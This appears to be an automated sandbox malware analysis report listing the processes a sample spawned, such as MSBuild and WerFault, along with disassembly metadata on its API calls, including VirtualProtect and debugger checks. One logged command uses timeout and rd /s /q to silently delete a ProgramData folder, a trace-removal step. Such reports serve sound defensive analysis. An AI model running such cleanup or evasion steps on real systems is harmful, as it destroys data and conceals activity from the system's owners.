                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x3f0000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0xeb0000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                    Start time:09:15:17
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
                                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                    Start time:09:15:21
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                    Start time:09:15:21
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                    Start time:09:15:21
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true


                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:0.7%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:17.1%
                                                                                                                                                                                                                      Total number of Nodes:76
                                                                                                                                                                                                                      Total number of Limit Nodes:2

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(00698AD8,?,00000040,?), ref: 00612963
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID: '$N
                                                                                                                                                                                                                      • API String ID: 544645111-2731476038
                                                                                                                                                                                                                      • Opcode ID: 9043a65889163a614cf48ca5001f965a9c8cfaea414a42ab2147e5feea910995
                                                                                                                                                                                                                      • Instruction ID: 406bbb475440beca1ea6b889430510c8c9b45e33c6e91c3a5130390f2a4fd542
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9043a65889163a614cf48ca5001f965a9c8cfaea414a42ab2147e5feea910995
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E112FF1BA30D1F07E70C60398D633E6944FD7AA720F495337AA67D77F4E26A09929284
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,0062A3CE,00000002,00000000,?,?,?,0062A3CE,?,00000000), ref: 0062A149
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,0062A3CE,00000002,00000000,?,?,?,0062A3CE,?,00000000), ref: 0062A172
                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,0062A3CE,?,00000000), ref: 0062A187
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                      • Opcode ID: 4df8f9a42d0f63db06a4aee3f8208b8cb4b83f58fcf91a98e67b95805a87c6d3
                                                                                                                                                                                                                      • Instruction ID: 4413f59fa1976d30ce96c9cb654ffae97a1c5229eba16460bcbecd7456949317
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4df8f9a42d0f63db06a4aee3f8208b8cb4b83f58fcf91a98e67b95805a87c6d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E921B532700921ABEB308F94E809AD773A7AF50FB4F564024E906D7300E7B2DD51CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0062A391
                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0062A3DA
                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0062A3E9
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0062A431
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0062A450
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 415426439-0
                                                                                                                                                                                                                      • Opcode ID: daf6ce300f1093c08b75009c1fa717581ad80b44f9ce8fc1eeba4c2de12e64f5
                                                                                                                                                                                                                      • Instruction ID: bfb22748b4d1c6c75ed6f8b5ae8e6a936ab7c715910702b515ea974c316638c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daf6ce300f1093c08b75009c1fa717581ad80b44f9ce8fc1eeba4c2de12e64f5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92518472A00A25AFDF10DFE5EC45AEE73BABF44700F044429E910EB291E7B199008F66
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,0061F7B7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006299E2
                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0061F7B7,?,?,?,00000055,?,-00000050,?,?), ref: 00629A0D
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00629B70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                                                                      • API String ID: 607553120-905460609
                                                                                                                                                                                                                      • Opcode ID: cfc7da339628f22baaefd86713ea1e8966f6148da65ae1d49a163b50a5b38187
                                                                                                                                                                                                                      • Instruction ID: 818390ef7fcda5591a981e751b03f4b3c5d113e93674928a9f3f0eca066ccb14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfc7da339628f22baaefd86713ea1e8966f6148da65ae1d49a163b50a5b38187
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83712931A00B26AADB24AB74FC46BE773AAEF95310F14442DF905DB281EA71D940CF74
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006177D1
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0061789D
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006178B6
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 006178C0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                      • Opcode ID: 27a226c415d492b2f056bb50ac60fc729c569982c7002a6597026c24dc9ce039
                                                                                                                                                                                                                      • Instruction ID: f2b303aabcb7d8d280fdc9036fd2878a1036d51d94ca7c9af1a25dd8f06a9450
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27a226c415d492b2f056bb50ac60fc729c569982c7002a6597026c24dc9ce039
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31F575D052189BDF61EFA4D949BCDBBB8AF08300F1441EAE50CAB250EB719A85CF45
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629D88
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629DD2
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629E98
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                                                                                                      • Opcode ID: dc73b1dadaa3203bcf0ee0b18354654abab9e3b1d5d626328f1d5ac77ac79dc8
                                                                                                                                                                                                                      • Instruction ID: c3e1139abc2938b57ccfb923525def2dd582cb23bb7fb0d9811265ae3232027e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc73b1dadaa3203bcf0ee0b18354654abab9e3b1d5d626328f1d5ac77ac79dc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B61D171500A279FDB68DF28ED82BFAB3AAEF44300F144079E945C6285EB34D981CF64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0061B6DE
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0061B6E8
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0061B6F5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                      • Opcode ID: acd900a1b2ed66547b9001480ba1d541b1b988f8f232410595f2b9d57efec6ce
                                                                                                                                                                                                                      • Instruction ID: d926f73229bc8671aded0653bd9f22bf7cf4b57c85418e1c64e47a1cc8cec889
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acd900a1b2ed66547b9001480ba1d541b1b988f8f232410595f2b9d57efec6ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D831D2749012289BCB61DF24D988BCCBBB9BF08310F5451EAE40CA72A1EB709FC58F55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0062031D,?,20001004,00000000,00000002,?,?,0061F91F), ref: 00621F20
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 2299586839-1810561636
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: /$UT
                                                                                                                                                                                                                      • API String ID: 0-1626504983
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: ``C$x`C
                                                                                                                                                                                                                      • API String ID: 0-4276601940
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00626620,?,?,?,?,?,?,00000000), ref: 00626852
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629FDB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00629D34,00000001,00000000,?,-00000050,?,0062A365,00000000,?,?,?,00000055,?), ref: 00629C80
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00629F50,00000000,00000000,?), ref: 0062A1E2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
